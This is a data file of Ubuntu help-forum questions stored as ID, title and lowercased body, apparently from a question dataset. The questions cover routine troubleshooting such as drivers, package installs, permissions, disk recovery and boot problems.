507291	missing icons in the launcher after upgrade to ubuntu 14.04	after upgrading a particular system from 13.10 to 14.04 there are a few items in the launcher portrayed with a question mark : this is not the old problem of windows mismatching applications . the icon is always rendered this way , no shadow icon is created when the application is running and it gets the visual semantics and behaviour as any other functioning launcher item . it is neither a missing icon or a wrong icon path . following some shell output regarding one of the applications concerned : $ cat /usr/share/applications/eclipse.desktop [ desktop entry ] type=application name=eclipse icon=/usr/local/eclipse.kepler/eclipse.png exec=env ubuntu_menuproxy= /usr/local/eclipse.kepler/eclipse terminal=false categories=development ; ide ; java ; $ ls -la /usr/local/eclipse.kepler/eclipse.png -rw-r -- r -- 1 lads lads 53556 jun 11 19:00 /usr/local/eclipse.kepler/eclipse.png what could then be the cause ?
507296	skype on my laptop not working	skype on my ubuntu laptop is not working . it is signing in , then a small window comes up , then closes , and it crashes every time . output of uname -a : linux vostro-2520 3.2.0-32-generic # 51-ubuntu smp wed sep 26 21:33:09 utc 2012 x86_64 x86_64 x86_64 gnu/linux ) after skype closes , the following pop up comes up : sorry , uuntu 12.04 has experienced an internal error executablepath /usr/bin/skype ; package skype ( not installed ) ; problem type crash ; title skype crashed with sigabrt ... ..and so on i tried some suggestions from net such as uninstalling and re-installing skype , mv .skype .skype-backup ) but am still facing this problem .
507298	what 's the proper way to install nvidia drivers now ?	background : once upon a time , when i installed ubuntu 10.x on an older machine , and kept upgrading it until 13.04 or 13.10 , there was an easy-to-find option in settings that allowed to install nvidia 's proprietary drivers and keep them up to date ( or not , because sometimes they released a new version with a bunch of awful regressions ) . now , when i installed 13.10 on my new laptop , which i then upgraded to 14.04 , i have n't ever been able to find that option anywhere . an attempt to install nvidia drivers with apt-get dont-remember-what resulted in a screwed up system that would n't properly start unity ( or even xorg , not sure ) , roughly equivalent to an unbootable system . but i managed to revert that . i seem to understand that there are some sort of opensource drivers called `` nouveau '' that come by default in ubuntu which kind of provide an alternative to nvidia 's proprietary drivers . is that so ? the practical questions : is it ok to not install nvidia 's drivers , or am i underutilizing the potential of the gpu ( i.e . not using all the available hardware acceleration ) ? or in other words : is there a test i can run to check whether hardware acceleration of my gpu is being properly used with my current setup ( nouveau or whatever it is ) ? what 's the proper recommended way to install nvidia proprietary drivers now on ubuntu 14.04 , without bricking the system ?
507300	how to install for the person that ca n't make sense of the how to page .	so i am trying to figure out how to use ubuntu for the first time . zero linux experience . unless you count using my android phone that came that way . anyway i downloaded the desktop ubuntu . how do i make that a bootable usb . i have looked at http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-ubuntu the ubuntu file is an iso so those instructions defie my sense of logic . to be clear i did burn it to a disc to see if i could find the `` start up disc creator '' . the answer is no that is n't on the iso . mind you that i do not want to overlay ubunto onto windows . i do n't want it side load or sharing the same disc as windows . i want to install it to its own disc to be the native os for that disc . the iso seems to be an installer for windows . i will be using windows of course to make the usb install drive . that is as much relationship as i want the two to have though . thanks for the help in advance .
507302	updated intel display driver causing errors when booting	i upgraded to to graphics installer 1.0.6 on my ubuntu 14.04 and installed the drivers using the intel graphics installer . the laptop is intel ivybridge powered with intel hd graphics . it optimus but i have disabled the nvidia card in bios . the intel graphics installer installs the package i915-3.15-3.13-dkms.deb which i assume is the updated driver . it causes a bunch of error messages when i boot . here are the relevant errors from dmesg when i boot : [ 7.206151 ] drm : module verification failed : signature and/or required key missing - tainting kernel [ 7.208045 ] drm : module has bad taint , not creating trace events [ 7.336470 ] fb : conflicting fb hw usage inteldrmfb vs vesa vga - removing generic driver [ 7.393854 ] [ drm ] supports vblank timestamp caching rev 2 ( 21.10.2013 ) [ 7.393855 ] [ drm ] driver supports precise vblank timestamp query . [ 7.393921 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 7.505798 ] [ drm ] gmbus [ i915 gmbus dpb ] timed out , falling back to bit banging on pin 5 [ 7.507233 ] init : failed to obtain startpar-bridge instance : unknown parameter : instance [ 7.944183 ] [ drm : cpt_serr_int_handler ] *error* pch transcoder a fifo underrun [ 8.368479 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device [ 8.368480 ] i915 0000:00:02.0 : registered panic notifier [ 8.818416 ] [ drm ] enabling rc6 states : rc6 on , rc6p on , rc6pp off what could the problem be and will it affect performance ? i tried to remove the package and the errors went away but i 'm then running and older driver i assume ?
507303	not able to hibernate windows 7 after full installation of ubuntu 14.04	yesterday i had installed ( instal ubuntu alongside windows ) ubuntu 14.04 in my laptop running windows 7 64 bit . everything is working fine , except that when i am in windows i am not able to hibernate . when i choose to hibernate , the login screen appears . hibernate was working fine before i installed ubuntu . can anyone please help me and tell is there any workaround to overcome this.any suggestion would be highly appreciated .
507305	xubuntu 14.04 : keyboard layout switches back to default	since i upgraded to xubuntu 14.04 i have had problems switching back and forth between my two keyboard layouts : danish ( default ) and hindi ( variant ) . if i switch the layout to hindi and then change application , the layout immediately switches back to danish . this is quite irritating when , for example , i am using the hindi layout in libreoffice and then have to check something in firefox , want to change music in gmusicbrowser , or something similar . every time i leave libreoffice , for whatever reason , the layout switches back to danish . is there a box i can tick so this does not happen ? ( i am using fcitx rather than ibus , if that has any bearing on the issue . ) thanks in advance for any suggestions .
507307	ext4 file system got damaged due to improper write	this is what happened , i inserted my ( important ) external hdd into a redhat 6 machine , did my task 's , unmounted the drive via nautilus , and physically detached the drive from the machine ( and now i realized that , i detached the drive in a hurry while nautilus ( of rhel6 ) was writing some thing to the disk ) . that hardisk had 3 partitions , 100gb ext4 , 50gb ext4 and remaining about 148gb ntfs . later i connected it again to my ubuntu 14.04 machine , and now the two ext4 partitions of the drive are not mounting . here is what gparted says , and , also , here is the sudo fdisk -l command 's output , disk /dev/sdb : 320.1 gb , 320072932352 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142446 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf909bf11 device boot start end blocks id system /dev/sdb1 2048 209717247 104857600 83 linux /dev/sdb2 209717248 314574847 52428800 83 linux /dev/sdb3 314574848 625141759 155283456 7 hpfs/ntfs/exfat i am not that familiar to fsck or fsck.ext4 command , please provide me a direction .
507308	ubuntu 14.04 with lvm over 4 disks	i have ubuntu 14.04 server addition installed , i have 4x 600g hard drives . the boot partition is on one disk . i notice the following filesystem type 1k-blocks used available use % mounted on /dev/mapper/utraffic22 -- vg-root ext4 510470992 3063792 481453716 1 % / none tmpfs 4 0 4 0 % /sys/fs/cgroup udev devtmpfs 32952936 4 32952932 1 % /dev tmpfs tmpfs 6592836 1208 6591628 1 % /run none tmpfs 5120 0 5120 0 % /run/lock none tmpfs 32964164 0 32964164 0 % /run/shm none tmpfs 102400 0 102400 0 % /run/user /dev/sda1 ext2 240972 37052 191479 17 % /boot tmpfs tmpfs 8388608 896 8387712 1 % /mnt/tmpfs it seems only 1 ( 600g ) drive . the other drives are there , and are listed as lvm members apcon @ utraffic22 : ~ $ sudo blkid /dev/sda1 : uuid= '' 9f7025ec-8869-4470-a96e-715eafc88213 '' type= '' ext2 '' /dev/sda5 : uuid= '' 0ef9wb-cs5l-vivc-sn0b-x6hg-e2ry-fwzqwe '' type= '' lvm2_member '' /dev/sdb1 : uuid= '' um1dde-5hln-28q1-93gc-bo3s-yp62-ewq11q '' type= '' lvm2_member '' /dev/sdd1 : uuid= '' eke2bd-o2ck-lr5m-xmtp-zrjp-jtc8-yplrwo '' type= '' lvm2_member '' /dev/sdc1 : uuid= '' pq3vjx-xtqm-x7ee-93hs-f0cw-gncq-k1ootc '' type= '' lvm2_member '' /dev/mapper/utraffic22 -- vg-root : uuid= '' 6837c1bd-79ab-4e37-8065-b8733b9f569e '' type= '' ext4 '' /dev/mapper/utraffic22 -- vg-swap_1 : uuid= '' 534cbad1-4c98-4a99-8243-db02f8f5b167 '' type= '' swap '' i 'm interested in installing centos onto the other drives , can that be possible as they are already configured as lvm members ?
507309	belkin wireless usb f9l1101v2 incompatible w/ 14.04 ?	hey all and thank you for reading . i followed this guide : belkinf9l1101v2 and i ca n't seem to get it working on my system like this user was able to . everything actually works properly up until the `` make '' command is executed : error pastey if anyone has any ideas why this would happen i would love to figure out how to fix it ! this is a freshly installed system . any other information needed can be provided : ) thanks !
507310	network manager icon disappeared 14.04	so a couple of weeks ago my network manager icon stopped appearing ; i still get automatically connected to my saved networks and the internet works fine , etc . if i go into system settings and look at the network settings i can still see all the networks , only the icon that 's normal in the top bar is missing . i have no idea what caused this , i do n't remember installing anything . i think it just happened after a regular update . i tried these commands to make sure i was properly up-to-date ( which i found on another forum post ) sudo apt-get -f install sudo apt-get update sudo apt-get upgrade that did n't do it so i found this post : network manager indicator missing i followed the instructions in those answers ; sudo apt-get purge network-manager-gnome & & sudo apt-get install network-manager-gnome and , quoted from an answer there : add nm-applet to the startup applications ( which may be found by entering `` startup applications '' in the dash ) . i restarted and then saw no unity interface at all ! so i tried those 3 commands above to update again and thankfully that fixed unity but i still do n't have my network manager . if i try the command nm-applet in a terminal it says : nm-applet-message : using fallback from indicator to gtkstatusicon so ... . i 'm pretty much stumped . any help would be appreciated .
507312	sftp excecute bit does not seem to be working correctly	i am trying to replace an existing ftp server and switch the users to be using sftp . we have some strict requirements as far as permissions required on the folders . for instance on the user 's ftp root ( which is shared between several users with different permissions created with acl ) we have /foldera/folderb /foldera/folderc user has x on foldera user has xr on folderb user has xw on folderc with ftp , user is able to cd to foldera but not ls user is able to cd and ls in folderb as well as download files user is able to cd but not ls on folderc but is able to upload files i have set up sftp for a new user and mounted foldera in their ( chrooted ) home directory . when i only have the x bit set it can not cd into any of the folders , i get permission denied . as soon as i set the r bit i can cd into the folder and obviously i am also able to ls however what i need is for the user to be able to cd into the folder but not ls it or read files from it . i am using acls for my permissions , it looks like this # file : foldera # owner : root # group : root user : :rwx user : newuser : -- x group : : -- - other : : -- - # file : folderb # owner : root # group : root user : :rwx user : newuser : r-x group : : -- - other : : -- - # file : folderc # owner : root # group : root user : :rwx user : newuser : -wx group : : -- - other : : -- -
507313	mouse not working	upon starting ubuntu my mouse works perfectly , but after a few seconds i can no longer click or select using the mouse . after these few seconds , the pointer itself still moves on the screen fine . however , when i move the pointer over something that should be highlighted when the mouse is over it , it does not highlight nor can i click to open it . i am running ubuntu 12.04.3 lts on my pc if that helps . i have tried using an external mouse but the same issue occurs .
507317	delete all i386 packages from my local repository ?	i just copied a repository of the previous ubuntu version ( 13 , saucy ) . it contains both i386 and amd64 versions of the packages . i want to use this repository on a 64 bit pc . is there a terminal command i can use to remove all of the i386 versions ? edit : i am assuming that all packages have a amd64 version . otherwise , if a package only has an i386 version , i want to retain it .
507319	file manager does n't open first instance kubuntu	i am using nemo as a file manager on kubuntu 14.04 when i click to open nemo the first time , it looks like nothing happens . when i click to open nemo the second time , i get a window with a < 2 > for it being the second one , except i can not see the first one . would anyone know what 's going on ? thanks in advance .
507320	starting with ubuntu in digitalocean : pip failing with `` permission denied ''	i am a windows person , and an ubuntu and digitalocean newbie . i completed the steps in https : //www.digitalocean.com/community/tutorials/initial-server-setup-with-ubuntu-12-04 and am going through https : //www.digitalocean.com/community/tutorials/how-to-install-and-configure-django-with-postgres-nginx-and-gunicorn but it is failing at pip install django , with oserror : [ errno 13 ] permission denied : '/opt/myenv/build' traceback : ( myenv ) jeffy @ originaldjangster : ~ $ pip install django downloading/unpacking django cleaning up ... exception : traceback ( most recent call last ) : file `` /opt/myenv/local/lib/python2.7/site-packages/pip/basecommand.py '' , line 1 22 , in main status = self.run ( options , args ) file `` /opt/myenv/local/lib/python2.7/site-packages/pip/commands/install.py '' , l ine 278 , in run requirement_set.prepare_files ( finder , force_root_egg_info=self.bundle , bundl e=self.bundle ) file `` /opt/myenv/local/lib/python2.7/site-packages/pip/req.py '' , line 1153 , in prepare_files location = req_to_install.build_location ( self.build_dir , not self.is_downloa d ) file `` /opt/myenv/local/lib/python2.7/site-packages/pip/req.py '' , line 218 , in b uild_location _make_build_dir ( build_dir ) file `` /opt/myenv/local/lib/python2.7/site-packages/pip/req.py '' , line 1527 , in _make_build_dir os.makedirs ( build_dir ) file `` /opt/myenv/lib/python2.7/os.py '' , line 157 , in makedirs mkdir ( name , mode ) oserror : [ errno 13 ] permission denied : '/opt/myenv/build' storing debug log for failure in /home/jeffy/.pip/pip.log debug log : jeffy @ originaldjangster : ~ $ more /home/jeffy/.pip/pip.log -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- /opt/myenv/bin/pip run on tue aug 5 14:45:38 2014 downloading/unpacking django cleaning up ... exception : traceback ( most recent call last ) : file `` /opt/myenv/local/lib/python2.7/site-packages/pip/basecommand.py '' , line 122 , in main status = self.run ( options , args ) file `` /opt/myenv/local/lib/python2.7/site-packages/pip/commands/install.py '' , line 278 , in run requirement_set.prepare_files ( finder , force_root_egg_info=self.bundle , bundle=self.bundle ) file `` /opt/myenv/local/lib/python2.7/site-packages/pip/req.py '' , line 1153 , in prepare_files location = req_to_install.build_location ( self.build_dir , not self.is_download ) file `` /opt/myenv/local/lib/python2.7/site-packages/pip/req.py '' , line 218 , in build_location _make_build_dir ( build_dir ) file `` /opt/myenv/local/lib/python2.7/site-packages/pip/req.py '' , line 1527 , in _make_build_dir os.makedirs ( build_dir ) file `` /opt/myenv/lib/python2.7/os.py '' , line 157 , in makedirs mkdir ( name , mode ) oserror : [ errno 13 ] permission denied : '/opt/myenv/build' jeffy @ originaldjangster : ~ $ visudo : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults mail_badpass defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all jeffy all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d i skipped the problem step and proceeded successfully until pip install gunicorn , at which point i got the same error : oserror : [ errno 13 ] permission denied : '/opt/myenv/build' fyi : i am doing this within an activated virtualenv , as instructed . what am i doing wrong ? thank you for helping . the above is my primary problem . if the following is easy to answer in addition , please do . it is the step i need to take as soon as i figure the above out : i also need to know how to upgrade from python 2.7.6 to python 3.4.1 ( or the highest available ubuntu-compatible release ) . python was already installed -- i did not install it . i would like to only have 3.4.1 . i do n't want 2.7 and 3.4 side by side . jeffy @ originaldjangster : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty jeffy @ originaldjangster : ~ $ python -- version python 2.7.6
507321	problem to use alias with wine ie8	i want to use alias with ie8 using wine . but i do n't want to to use $ wine 'c : \program files\internet explorer\iexplore and just $ ie8 but i ca n't : vitor @ vitor-pc : ~ $ alias ie8='wine c : \program files\internet explorer\iexplore' vitor @ vitor-pc : ~ $ ie8 wine : can not find 'c : program' vitor @ vitor-pc : ~ $ ie8 wine : can not find 'c : program' vitor @ vitor-pc : ~ $ alias ie8='wine c : \programfiles\internet explorer\iexplore' vitor @ vitor-pc : ~ $ ie8 wine : can not find 'c : programfilesinternet' vitor @ vitor-pc : ~ $ alias ie8='wine c : \program_files\internet_explorer\iexplore' vitor @ vitor-pc : ~ $ ie8 wine : can not find 'c : program_filesinternet_exploreriexplore' vitor @ vitor-pc : ~ $ how can i alias with wine for use ie8 ? thanks !
507327	package not present in ubuntu package list . different approach ( ubuntu precise 12.04 )	i currently have an application that i am doing packaging now . i require ruby2.0 and the package is for ubuntu precise . ( 12.04lts ) but the issue is that , ubuntu precise package list does not have ruby2.0 by default , what is the solution ? is it possible to put the ruby2.0 dependency on a remote repo and call it ? basically , when i run the deb package , it requires ruby2.0 to run , and when all the dependencies are installed from ubuntu packages by default ( aptitude ) , ruby2.0 is not being installed because it is not been able to be fetched ! is it possible to change the aptitude path to a remote repo so that everytime when i install the package , that particular dependency will be fetched from the remote repo and not from ubuntu package list ( server ) . if so ? how to do it ?
507335	installating ubuntu in an android phone	question 1 : is it possible to install ubuntu in asus zenfone 5 along with android os simultaneously or singularly ? question 2 : what is the procedure ?
507338	12.04 or 14.04 for an old computer ?	i searched on web about this question and mostly , i found that 14.04 is a way better than 12.04. but only one answer i found , that say `` i am using an old computer and weirdly , i found that 12.04 works better than 14.04 '' so i got a doubt , and i want to ask here , this laptop have : 2 gb memory ( ddr2 ) intel® core™2 duo cpu t5450 @ 1.66ghz × 2 processor intel® 965gm x86/mmx/sse2 graphics 32-bit os type which version of ubuntu , you prefer ?
507341	how to make carbon copy of ubuntu 14.04 and re-install it later ?	my ubuntu set-up is quite complex and it requires few hours of installing software , changing bash configuration and creating a lot of symlinks . since i often experiment with my system , it tends to get broken and i need to spend few hours configuring everything again . is it possible to make copy of existing , working installation of ubuntu , with everything configured , and in case of system failure or other issue , re-deploy it on the same hdd/sdd/partition ? is above possible with another partition , of new size and possibly on another device/hdd/sdd ? i hear about clonezilla , but i am not sure it does what i described and i am not sure how to test if copy it creates works well .
507344	error `` shockwave flash has crashed `` google chrome ubuntu 14.04.1	i can not watch videos on twitch because shockwave flash crashes . i tried to disable the flash in the plugins but i only seen one flash plugin . before when i used 12.10 , i saw 3 plugins for flash , and i could disable one to allow me to watch twitch . not anymore . does anyone have any idea what my issue is ?
507345	how to set a password for ubuntu cloud images ( ie . not use ssh )	i 'm running an openstack cloud with a very particular network configuration , that makes it impossible for an instance to communicate with anything in the outside world until after i login into it and set several config files . as a result of this , i can not log in to instances using ssh keys . is there a way to set a default password on an ubuntu 12.04 ( has to be 12.04 ) cloud image so i can log in to it directly from the horizon console ? i tried using the procedure outlined at https : //ask.openstack.org/en/question/5531/defining-default-user-password-for-ubuntu-cloud-image/ but it did not work on ubuntu 12.04 ... it did work on 14.04 though . update : oh come on people , this is a simple request for a basic functionality that the cloud images ought to have already .
507348	how to give permission to a directory which including lots of images	i want to run my project on localhost and i gave permission to all directories including in my project . but the problem is in image directory . how can i give permission to each and every images . it is quit difficult for me because there is lots of images in my image folder . i used sudo chmod 777 < directory >
507349	pxe boot issue with edubuntu 12.04	i have an edubuntu server that has been used to boot both thin clients and fat clients for quite some time . now , we 're trying to use hp 8200s with allied telesis at2711 100base-fx nics , and things have gotten weird when trying to boot with the at cards . the at nic will request and get an ip address , download and load the image . then , it requests the ip address the second time , but applies the address to the on-board network connection ! if i connect a patch cable to the onboard network connection before initramfs times out to busybox , the computer finishes booting . but only the on-board network connection is active , the computer acts like the at nic is n't even there , even though lsmod shows the tigon tg3 driver being loaded . i 've been all over the 'net , all over the canonical website , but ca n't find anything that helps . ipappend 2 , ipappend 3 , adding biosdevname=0 to pxelinux.cfg/default , blacklisting modules so they can be loaded in a different order specified in chroot etc/modules , adding to the net ) section in initramfs-tools/hook-functions ... ... .in short , i 've tried everything that i could find that seemed to have a chance of helping . allied telesis changed the design of their card earlier this year ; i remember that the old version did not have this problem . but , i ca n't go back and verify because we 've shipped all the old inventory and have none left . ( btw , i 'm using this setup in a qa environment , to run a final functional test on products before we deliver to customers . ) any help , except the suggestion of using a different nic , would be greatly appreciated . the card can not be changed for a number of reasons , not the least of which is a contractual requirement .
507353	translating from red-hat to ubuntu	i am starting in linux because i need it for my reseach . since i have little time and no local expert support , this is a need based self-learning experience . i have to install a tool and i got this script for installing , download some libraries and create dependencies . yet i have found that it contains some commands that work on red-hat and not in ubuntu ( like yum ) . because i lack knowledge , i would like to know if there are other parts in the code that i should modify in order i can make this work . could you help me please ? thanks in advance . script : # ! /bin/sh set -e -x # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # cpanm # version 1.6908 # dependencies yum install -y make gcc tar curl perl perl-module-build # go to bin cd /usr/bin # download script , make it exec curl -lo https : //raw.github.com/miyagawa/cpanminus/1.6908/cpanm chmod +x cpanm # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # prinseq # version 20.4 # create your base folder mkdir -p /opt/prinseq cd /opt/prinseq base_folder=/opt/prinseq # prinseq native deps : cairo libs yum install -y cairo cairo-devel # random prereqs cpanm test : :simple @ 0.98 cpanm pod : :parser @ 1.60 # for some reason , this is pathtools @ 3.40 cpanm cwd @ 3.40 cpanm common : :sense @ 3.6 cpanm json : :xs @ 2.33 cpanm json @ 2.57 cpanm getopt : :long @ 2.39 cpanm pod : :usage @ 1.61 cpanm digest : :md5 @ 2.52 cpanm version @ 0.9902 cpanm mime : :base64 @ 3.13 # update module : :build cpanm module : :metadata @ 1.000011 cpanm json : :pp @ 2.27202 cpanm cpan : :meta : :yaml @ 0.008 cpanm parse : :cpan : :meta @ 1.4404 cpanm cpan : :meta : :requirements @ 2.122 cpanm cpan : :meta @ 2.130880 cpanm perl : :ostype @ 1.003 cpanm module : :build @ 0.4005 # cairo bindings cpanm extutils : :depends @ 0.304 cpanm extutils : :pkgconfig @ 1.14 cpanm cairo @ 1.103 # stats related cpanm math : :matrixreal @ 2.08 cpanm math : :cephes : :matrix @ 0.51 cpanm text : :simpletable @ 2.03 cpanm want @ 0.21 # need old version of contextual : :return cpanm http : //search.cpan.org/cpan/authors/id/d/dc/dconway/contextual-return-v0.2.1.tar.gz cpanm statistics : :pca @ 0.0.1 # download prinseq , install wget http : //resources.ohnosequences.com/prinseq/prinseq-lite-0.20.3.tar.gz tar -xzf prinseq-lite-0.20.4.tar.gz rm prinseq-lite-0.20.4.tar.gz chmod +x prinseq-lite-0.20.4/*.pl # links ln -sf $ base_folder/prinseq-lite-0.20.3/*.pl /usr/bin/
507354	how to install ubuntu 14.04 on my mac pro 1,1 with a raw hard drive by a bootable usb stick	i have a mac pro 1,1 and i replaced the original hard drive with a new 3tb hard drive ( just got , never initialized ) . i try to install ubuntu by a bootable usb stick which i crated on my mac when i fellow the instruction on [ https : //help.ubuntu.com/community/macpro ] [ 2 ] however i find out it does not work . and in this instruction , it mentioned mac pro 1,1 is efi incompatibilities , that is also the reason i can not install refind . this instruction has a link [ http : //cdimage.ubuntu.com/releases/11.04/release/ ] [ 3 ] seems can help my situation , but that page is not available . now the bootable usb stick never show up when i restart my mac pro with pressing the option button . i appreciate any answer can help me out .
507357	was developing wubi a difficult endeavour ? why or why not ?	the only thing which i know about wubi , is that it allowed you to install ubuntu on ntfs . one might think that this was an easy application to develop , as all it was on the surface , was installing ubuntu on another file system , just as you may install ubuntu on fat , ext2 , reiserfs , etc . so with this in mind ; was creating a piece of software that installed ubuntu on a windows machine an easy endeavour ?
507359	switching to terminal-only fails	i attempt to switch to terminal-only using sudo service stop lightdm and this turns off the gui , but i ca n't type in any commands , although there is a cursor that shows up . i 'm not sure what 's happening , so any guidance on terminal mode would be greatly appreciated
507363	is it possible to setup a root like user for global read only access ?	i 'm hoping to give a security scanner a user that can read everything but not change or execute anything . is this possible and if so how ?
507365	ecryptfs - unknown password and possibly lost	this is probably going to be a long post , but at the moment i can not see the wood for the trees , so any help appreciated . in a nutshell : the other night i changed my ( login ) password . then forgot it . so i went in via a live cd and changed it as root . also , when i changed my password originally , i used sudo ( not that this should matter ) as the normal user . the ( possible ) saving grace is that i have a rough idea of what the password was - just ca n't seem to re-create it for the login passphrase for ecryptfs . when i created my encrypted directory a couple of years ago , i recall writing the password i used at the time - it 's a plain text english mixed password - for example it was written down on my piece of paper as ( this is n't it btw ! ) : hdd password : pa $ $ w0rd i 'd never really bothered with it since because i had this data written down . i am meticulous in recording digits , upper case etc. , and even now recall the program i was watching that inspired me for the password . however , after having read several articles , it appears that the passphrase is actually a 32 byte string . i have to admit i am confused , and require some pointers in trying to clear this up . point-by-point : if i 've lost my hdd password and login passphrase , i 've read you ca n't get your data back . is this even true in light of future developments in computing ? what was difficult to crack 10 years ago is much easier now . this would apply to this situation , right ? is there any way of recovering this , via security company or hacking ( read : editing ) the sources to ( for example ) get john the ripper to go through all possible permutations to run in the sources of ecryptfs inside the ecryptfs process to try it that way ? is the hdd password i wrote down relevant ? i 've only ever encrypted a file system once , and ca n't recall how it was done - might my text password , pa $ $ w0rd , have been used in generating the text for the hdd password ? because whenever it prompts for the passphrase in ecryptfs-unwrap-passphrase , inputting pa $ $ w0rd does not work . should ecryptfs-unwrap-passphrase work with pa $ $ w0rd ? it does not work and i know i wrote down pa $ $ w0rd for a specific reason ... not sure why , but the files in /home/.ecryptfs/user/.ecryptfs/wrapped-passphrase and /home/user/.ecryptfs/wrapped-passphrase are the same . i thought they 'd have been different ( since the new user directory is based on a different password ) - anyone shed any light on this ? also , i can mount my home directory - and have a copy of the files ( and their sizes ) from a backup disk ( shame i did n't do it recently ! ) - because of that , could i figure out from timestamps and file sizes the missing files , and possibly try to decrypt them individually ? i was so adamant in recording this phrase , pa $ $ w0rd , and can recall doing it , that i ca n't believe it 's not working . perhaps it was just my user password in the end ... feel free to ask any pointed ( or blunt ! ) questions , if you require more information . petty sure i 've lost the lot ...
507370	ubuntu 14.04 super slow after install	i have a compaq with intel atom cpu d410 @ 1.66 ghz x2 , ram is 2 gb and intel igdx86/mmx/sse2 . when i boot ubuntu from the live cd it worked like a charm even in my old computer , so i decided to install it as a dual boot with windows 7 . after the installation it was terribly slow . i have already try re-installing it but nothing changed . is it that my computer is just too old to run ubuntu ? if so , then why did it work perfectly fine from the livecd ? thanks for your help . the result of the command sudo fdisk -l is this disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc4478cd1 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 840583167 420188160 7 hpfs/ntfs/exfat /dev/sda3 953223168 976771071 11773952 7 hpfs/ntfs/exfat /dev/sda4 840583168 953223167 56320000 5 extended /dev/sda5 840585216 861065215 10240000 83 linux /dev/sda6 861067264 871307263 5120000 82 linux swap / solaris /dev/sda7 871309312 932749311 30720000 83 linux partition table entries are not in disk order
507371	how to setup and connect teletalk 3g modem in ubuntu 14.04 ?	i am very fond of linux and recently installed ubuntu 14.04 . i am having issues trying to connect my teletalk 3g modem in ubuntu 14.04 for mobile broadband . if anyone could provide step by step instructions on how to set this up , i would be greatly appreciative .
507374	an error occured- results	this all started when a red dot appeared on the menu bar . machine was operating poorly so i read the message that stated there was an error run package manager so i followed a thread to a person with the same message and run the recommended command and got the following message the following packages were automatically installed and are no longer required : language-pack-kde-en language-pack-kde-en-base libhal1 hal libhal-storage1 hal-info so i ran the command that was to remove them and terminal claimed success . i still have the previous mentioned error reported on the menu bar . sudo apt-get -f install reading package lists ... error ! e : read error - read ( 5 : input/output error ) e : the package lists or status file could not be parsed or opened . machine is performing about the same except the software center crashes .
507378	mp4s and jogs on micro sd that are black	i took a number of videos and photos with my canon on a `` generic '' micro sd card . many of them show up and work fine but there are some files that seem to be corrupt . they wo n't show in the finder and wo n't open in any apps . if i play the mp4s in vlc it shows the bar moving but no picture or sound . these files appear to have information . for example if i `` get info '' on the file is shows the size of the file , date time and duration . if i ask for media information in vlc it shows all the information - framerate , channels , resolution , bitrate ... but it wo n't play . is there anything that i can do to get these videos to play ?
507383	how to create hotspot with a broadcom bcm43228 wireless card ?	it seem impossible to configure this card to master mode . i can creat ah-doc connection , but no other device can see it . anyone knows if this is doable and how ? thanks in advance !
507384	libidn.so.11 error on starting an app	i 'm trying to run a total english digital book , an app i need for my work . upon running i get this message : error while loading shared libraries : libidn.so.11 : can not open shared object file : no such file or directory the file is installed on my system ( ubuntu 14.04 64 bit )
507386	installation of lubuntu 14.04 fails on powerpc imac g3 `` mount : ca n't find /run in /etc/fstab ''	i am trying to install lubuntu on an imac g3 because os 9 stinks and that is about the only way to make one of these wastes of plastics useful . i burned a disk with the power pc version of trusty tahr , but after a few walls of text and white screens it displays this : mount : ca n't find /run in /etc/fstab and restarts in 2 minutes . i tried this multiple times burning two different disks . please help me , and thank you for reading this .
507389	installing a package with apt-get for a single user	is it possible to install a package for just the current user ( placing files in locations that the user can write to , such as their home directory ) ?
507394	where are the configuration files that correspond to the system settings menu stored ?	in 14.04 , i want to make a copy of my system settings ( specifically my display ) , so that i can copy it into a virtual machine and have everything be the same every time i break and reinstall my sandbox system . all i really want to know is where are these config files located by default ?
507399	what is the `` character map '' application used for ?	ubuntu comes pre-installed with an application called `` character map '' . in the terminal , it can be launched as `` charmap '' . what is this application typically used for ? what function does it provide people that ubuntu sees as so necessary as to include by default in their distribution ?
507400	after installation 12.04 lts ( 04 ) - is not encrypted ?	am testing here 12.04.04 lts for amd64-mac and after installation - intended with encryption of /home - the installation is not encrypted ? ! with which command can i find out , if the partition is encrypted ? !
507405	compaq cq10-130ca	i , is there someone that have a compaq cq10-130ca running under ubuntu ? or how could i be sure that it will work ? thanks
